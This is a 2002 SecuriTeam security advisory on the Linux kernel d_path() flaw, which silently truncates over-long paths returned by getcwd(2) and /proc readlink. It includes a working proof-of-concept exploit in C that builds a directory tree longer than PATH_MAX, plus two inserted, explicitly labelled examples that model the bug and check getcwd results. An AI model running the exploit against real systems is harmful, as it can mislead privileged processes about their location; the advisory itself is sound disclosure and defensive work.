[UNIX] d_path() Truncating Excessive Long Path Name Vulnerability
From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 26 Mar 2002 22:02:12 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
d_path() Truncating Excessive Long Path Name Vulnerability
------------------------------------------------------------------------
SUMMARY
When a path name is excessively long, the kernel-internal function d_path()
returns only the trailing components of the path, silently truncated,
instead of an error value. Because the getcwd(2) system call and the
do_proc_readlink() function both call d_path(), user-space processes may
be handed a false path.
DETAILS
The d_path() kernel function builds the absolute path name string of the
'dentry' passed to it as an argument.
The path is assembled by concatenating successive path components,
starting from the trailing (leaf) component and working toward the root.
The concatenated path name is stored in a fixed-length buffer of PAGE_SIZE
bytes.
If the 'dentry' refers to a path longer than PAGE_SIZE - 1 characters, the
leading path components are never written to the buffer, and the function
returns the truncated path without any error value.
Because the getcwd(2) system call uses d_path(), it may return an invalid
path to the user-space process. If the returned path is longer than the
user-space buffer, however, a correct error value is returned.
The readlink(2) system call, when invoked on files in the proc file system,
uses do_proc_readlink(), which is also affected by the d_path() bug.
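The following is an added example, not code from the advisory or from the kernel: a user-space model of the path-assembly loop described above, with the silently-truncating behaviour the advisory reports next to a variant that reports running out of room as an error. Components are prepended into a fixed buffer while walking from the leaf toward the root, the way the advisory describes d_path() filling a PAGE_SIZE buffer. BUF_SIZE, prepend_components(), assemble_path_truncating() and assemble_path_checked() are names chosen for this example, not kernel identifiers, and the five-component input is constructed.

```c
/*
 * Added example, not part of the advisory or of the kernel: a user-space
 * model of the path-assembly loop d_path() is described as performing.
 * Names below are this example's own, not kernel identifiers.
 */
#include <stdio.h>
#include <string.h>
#include <errno.h>

#define BUF_SIZE 64   /* stands in for PAGE_SIZE; small so the overflow is easy to hit */

/*
 * Shared prepend loop. comps[0] is the component nearest the root and
 * comps[n-1] the leaf; they are copied in reverse order, each preceded
 * by '/'. Returns a pointer to the start of the assembled string. When a
 * component does not fit: with 'strict' set, errno is ENAMETOOLONG and
 * NULL is returned; with 'strict' clear, the loop just stops, which is
 * the behaviour the advisory reports.
 */
static const char *prepend_components(const char *const *comps, size_t n,
                                      char *buf, size_t bufsize, int strict)
{
    char *p = buf + bufsize - 1;   /* start at the end and walk backwards */
    *p = '\0';
    for (size_t i = n; i-- > 0; ) {
        size_t len = strlen(comps[i]);
        if ((size_t)(p - buf) < len + 1) {   /* no room for '/' + component */
            if (strict) {
                errno = ENAMETOOLONG;
                return NULL;
            }
            break;   /* silently drop this and every remaining root-side component */
        }
        p -= len;
        memcpy(p, comps[i], len);
        *--p = '/';
    }
    if (*p == '\0')   /* nothing written at all: the root directory */
        *--p = '/';
    return p;
}

/* Behaviour the advisory describes: a too-long path comes back truncated, no error. */
const char *assemble_path_truncating(const char *const *comps, size_t n,
                                     char *buf, size_t bufsize)
{
    return prepend_components(comps, n, buf, bufsize, 0);
}

/* Hardened variant: running out of room is reported as an error instead. */
const char *assemble_path_checked(const char *const *comps, size_t n,
                                  char *buf, size_t bufsize)
{
    return prepend_components(comps, n, buf, bufsize, 1);
}

int main(void)
{
    /* constructed input: five 15-character components, 80 bytes with the
     * separators, which cannot fit in a 64-byte buffer */
    const char *deep[] = { "123456789abcdef", "123456789abcdef", "123456789abcdef",
                           "123456789abcdef", "123456789abcdef" };
    char buf[BUF_SIZE];
    const char *r;

    r = assemble_path_truncating(deep, 5, buf, sizeof buf);
    printf("truncating: %s (%zu chars, two root-side components lost)\n", r, strlen(r));

    r = assemble_path_checked(deep, 5, buf, sizeof buf);
    printf("checked:    %s\n", r ? r : strerror(errno));
    return 0;
}
```

With the 64-byte buffer only three of the five components fit, so the truncating variant hands back a path that looks complete but names a directory three levels below the root rather than five; the checked variant returns NULL with errno set, which is the shape a caller such as getcwd(2) can turn into a proper error.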
Impact:
A privileged process may be tricked into believing it is inside an
arbitrary directory. Other scenarios are possible when readlink() is used
on files in the proc file system (such as "/proc/self/exe").
Exploit code:
/*
 * 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit
 *
 * Bug found by cliph
 */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strlen() */
#include <limits.h>
#include <errno.h>
#include <paths.h>      /* _PATH_TMP */
#include <sys/stat.h>   /* mkdir() */

/*
 * Note: on Linux 2.2.x PATH_MAX = PAGE_SIZE - 1 that gives us 1 byte for
 * trailing '\0'
 */
#define PATH_COMPONENT "123456789abcdef"

/* abort with a message if the preceding call set errno */
void err(char *msg)
{
        if (errno) {
                perror(msg);
                exit(1);
        }
}

int main(void)
{
        char buf[PATH_MAX + 1]; /* think of trailing '\0' */
        int len;

        errno = 0;
        chdir(_PATH_TMP);
        err("chdir");

        /* show CWD before exploiting the bug */
        getcwd(buf, sizeof(buf));
        err("getcwd #1");
        fprintf(stderr, "CWD=%.40s\n", buf);

        /* creating long directory tree - it must exceed PATH_MAX characters */
        for (len = 0; len <= PATH_MAX; len += strlen(PATH_COMPONENT) + 1) {
                errno = 0;
                mkdir(PATH_COMPONENT, 0700);
                if (errno != EEXIST)
                        err("mkdir");
                errno = 0;
                chdir(PATH_COMPONENT);
                err("chdir");
        }

        /* show CWD after exploiting the bug: on a vulnerable kernel the
         * leading components are missing and no error is reported */
        getcwd(buf, sizeof(buf));
        err("getcwd #2");
        fprintf(stderr, "CWD=%.40s... [stripped]\n", buf);
        return 0;
}
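The following is an added example, not part of the advisory: a user-space sanity check that a privileged program can apply before trusting what getcwd(2) returned, which is the condition the proof-of-concept above provokes. It compares the identity (st_dev, st_ino) of "." with that of the directory the returned string names; a truncated path of the kind the advisory describes names a different directory, or none, so the identities differ. cwd_is_consistent(), path_names_cwd() and strip_leading_component() are names chosen for this example, and the non-existent path used in the demonstration is constructed.

```c
/*
 * Added example, not part of the advisory: verify a getcwd() result by
 * directory identity rather than trusting the string. Function names are
 * this example's own.
 */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <limits.h>
#include <sys/stat.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* 1 if 'path' resolves to the same directory as ".", else 0 (including stat failure). */
int path_names_cwd(const char *path)
{
    struct stat here, named;
    if (path[0] != '/')           /* anything not absolute is not trusted */
        return 0;
    if (stat(".", &here) != 0 || stat(path, &named) != 0)
        return 0;
    return here.st_dev == named.st_dev && here.st_ino == named.st_ino;
}

/* Fill 'buf' from getcwd() and verify it. Returns 1 only when getcwd()
 * succeeded and the path it produced really is the current directory. */
int cwd_is_consistent(char *buf, size_t bufsize)
{
    if (getcwd(buf, bufsize) == NULL)   /* ERANGE/ENAMETOOLONG: an error, not a wrong path */
        return 0;
    return path_names_cwd(buf);
}

/* Model the truncation: "/a/b/c" becomes "/b/c". Used only to build a
 * wrong path for the demonstration below. Returns 0 if nothing can be stripped. */
int strip_leading_component(const char *path, char *out, size_t outsize)
{
    const char *next = (path[0] == '/') ? strchr(path + 1, '/') : NULL;
    if (next == NULL || strlen(next) >= outsize)
        return 0;
    strcpy(out, next);
    return 1;
}

int main(void)
{
    char cwd[PATH_MAX + 1], wrong[PATH_MAX + 1];

    if (cwd_is_consistent(cwd, sizeof cwd))
        printf("getcwd() result verified: %s\n", cwd);
    else
        printf("getcwd() result could not be verified\n");

    /* a truncated copy of the verified path must fail the same check */
    if (strip_leading_component(cwd, wrong, sizeof wrong))
        printf("truncated form %s names the current directory: %s\n",
               wrong, path_names_cwd(wrong) ? "yes" : "no");
    return 0;
}
```

The check costs two stat() calls and does not depend on the kernel reporting the truncation itself: a path that is missing its leading components either fails to resolve or resolves to some other directory, and both cases come back as 0. The same comparison can be applied to a readlink() result from "/proc/self/cwd".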
ADDITIONAL INFORMATION
The information has been provided by Wojciech Purczynski <cliph@isec.pl>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.